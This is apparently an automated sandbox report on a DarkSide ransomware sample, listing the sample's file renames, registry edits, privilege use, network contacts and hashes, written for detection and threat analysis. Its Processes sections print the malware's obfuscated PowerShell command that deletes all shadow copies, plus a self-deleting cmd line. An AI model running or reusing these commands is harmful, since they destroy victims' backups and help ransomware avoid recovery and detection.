Malware Analysis Report

2024-10-16 03:29

Sample ID 210517-zbnx1z48ba
Target sage2.donotopen
SHA256 b70a184f36903de934b93c5118561ddb1c3747e365575f92682ef09fbb48d5f8
Tags
darkside ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b70a184f36903de934b93c5118561ddb1c3747e365575f92682ef09fbb48d5f8

Threat Level: Known bad

The file sage2.donotopen was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer

DarkSide

Modifies extensions of user files

Reads user/profile data of web browsers

Deletes itself

Sets desktop wallpaper using registry

Enumerates physical storage devices

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Control Panel

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-05-17 14:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-05-17 14:07

Reported

2021-05-17 14:10

Platform

win7v20210410

Max time kernel

26s

Max time network

25s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\MergeProtect.tif.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\SelectRead.crw => C:\Users\Admin\Pictures\SelectRead.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\ConnectSet.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\DenyRequest.png => C:\Users\Admin\Pictures\DenyRequest.png.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\DenyRequest.png.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\SelectPop.raw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\SelectRead.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\ConnectSet.crw => C:\Users\Admin\Pictures\ConnectSet.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\MergeProtect.tif => C:\Users\Admin\Pictures\MergeProtect.tif.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\SelectPop.raw => C:\Users\Admin\Pictures\SelectPop.raw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe

"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\SAGE2D~1.EXE >> NUL

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 catsdegree.com udp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 8.8.8.8:53 16.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 24.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 13.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 15.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 1.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 19.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 21.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 20.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 25.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 32.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 35.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 38.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 40.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 39.0.7.10.in-addr.arpa udp
N/A 10.7.0.13:5355 N/A udp
N/A 10.7.0.16:5355 N/A udp
N/A 10.7.0.19:5355 N/A udp
N/A 10.7.0.15:5355 N/A udp
N/A 10.7.0.21:5355 N/A udp
N/A 10.7.0.25:5355 N/A udp
N/A 10.7.0.20:5355 N/A udp
N/A 10.7.0.32:5355 N/A udp
N/A 10.7.0.35:5355 N/A udp
N/A 10.7.0.38:5355 N/A udp
N/A 10.7.0.40:5355 N/A udp
N/A 10.7.0.39:5355 N/A udp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp

Files

memory/788-59-0x0000000075551000-0x0000000075553000-memory.dmp

memory/1616-60-0x0000000000000000-mapping.dmp

memory/1616-61-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmp

memory/1616-62-0x0000000001ED0000-0x0000000001ED1000-memory.dmp

memory/1616-63-0x000000001AC90000-0x000000001AC91000-memory.dmp

memory/1616-64-0x0000000002280000-0x0000000002281000-memory.dmp

memory/1616-66-0x000000001AC14000-0x000000001AC16000-memory.dmp

memory/1616-65-0x000000001AC10000-0x000000001AC12000-memory.dmp

memory/1616-67-0x0000000001F10000-0x0000000001F11000-memory.dmp

memory/1616-68-0x000000001C4C0000-0x000000001C4C1000-memory.dmp

memory/1616-69-0x000000001C590000-0x000000001C591000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 dab8d891d3796ee132d648b719db343c
SHA1 8eab3909265c184a9a26893589836f047591c54c
SHA256 7e2ec9da9919c4f541728636bfac5e74405033f0f7e7bd733c3e68d82349f786
SHA512 305ca5f6aff09b5d645b5ce1e74b5fe22227fa6d6d70c4ab3dd165b1a140857f929a1727ea341fff063d1dc39756d037d0aac2c10a8ea0f9757ad111edc90d87

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5fcb6bbfb6b9dfcc7478f6cfa20f8bf0
SHA1 3c0ac7025e2d9aa30ef10a51313d152307f46dd1
SHA256 4a2b89babae45fbedb1c4b80f696fbc89a8b13249789647f55c64cbb878e2a64
SHA512 be9c5563f3c7430369359dbb7a548d6135773ae49b11047eb8acb7fa5c849e979456c06a49b27dd0a862ef1886930e7ad3e182e265f43e6cf1bca70874b30fed

memory/2840-72-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-05-17 14:07

Reported

2021-05-17 14:10

Platform

win10v20210408

Max time kernel

60s

Max time network

69s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\SelectExport.crw.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\SkipStop.raw => C:\Users\Admin\Pictures\SkipStop.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\SkipStop.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\SelectExport.crw => C:\Users\Admin\Pictures\SelectExport.crw.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\21b2020d.BMP" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\21b2020d.BMP" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d\ = "21b2020d" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\21b2020d.ico" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe

"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\SAGE2D~1.EXE >> NUL

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 catsdegree.com udp
N/A 8.8.8.8:53 1.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 catsdegree.com udp

Files

memory/3108-114-0x0000000000000000-mapping.dmp

memory/3108-120-0x000001589A210000-0x000001589A211000-memory.dmp

memory/3108-125-0x000001589A3C0000-0x000001589A3C1000-memory.dmp

memory/3108-127-0x00000158FEC83000-0x00000158FEC85000-memory.dmp

memory/3108-128-0x00000158FEC86000-0x00000158FEC88000-memory.dmp

memory/3108-126-0x00000158FEC80000-0x00000158FEC82000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 67fc7b646bf0ff4129cf65bd31753fd9
SHA1 7428127d16a308ccd3d4ec950b540f31616322a9
SHA256 c87bb7e6b1480fff5001ec8fe03aa2b8868efa618c5576445a0676aaa31764b3
SHA512 9f58daffe014a9797c7e1d035f9577eab060d7a22ebc6cc4f40b9e348793d3b4adf27506df7ef5add9c86c6ee7c70d1cc1cb8cc3e9f33d447d72feeb7a32f264

memory/4648-144-0x0000000000000000-mapping.dmp